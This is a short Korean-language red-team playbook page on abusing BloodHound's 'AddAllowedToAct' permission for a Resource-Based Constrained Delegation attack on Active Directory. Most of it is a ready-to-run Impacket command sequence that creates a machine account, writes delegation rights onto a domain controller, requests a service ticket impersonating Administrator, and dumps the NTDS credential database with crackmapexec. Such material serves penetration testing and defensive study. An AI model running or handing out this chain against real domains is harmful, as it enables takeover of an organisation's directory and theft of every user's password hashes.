AddAllowedToAct

객체에 대해 Write msDS-AllowedToActOnBehalfOfOtherIdentity 권한이 있다면 블러드하운드에서 AddAllowedToAct로 표시되며 Resource Based Constrained Delegation 공격이 가능합니다.

# 새로운 머신 계정 생성
impacket-addcomputer -computer-name 'RBCD$' -computer-pass 'Password123!' -dc-host ad01.contoso.com contoso.com/user-A:'Password123!'

# 타겟의 RBCD에 계정 등록
impacket-rbcd -delegate-from 'RBCD$' -delegate-to 'AD01$' -action write contoso.com/user-A:'Password123!'

# 등록된 계정을 통해 TGT 발급
impacket-getST -spn cifs/ad01.contoso.com -impersonate Administrator contoso.com/RBCD$:'Password123!'
export KRB5CCNAME=Administrator.ccache

# NTDS 덤핑
crackmapexec smb contoso.com -u Administrator --use-kcache --ntds

References

https://lira.epac.to/DOCS/python3-impacket/examples/smbpasswd.pylira.epac.to

https://dan-feliciano.com/2024/07/14/phantom/dan-feliciano.com

AllowedToAct - SpecterOpsSpecterOps

AddAllowedToAct | 레드팀 플레이북www.xn--hy1b43d247a.com

PreviousAddMembers NextInherited GenericAll

Last updated 7 months ago

hashtagReferences

References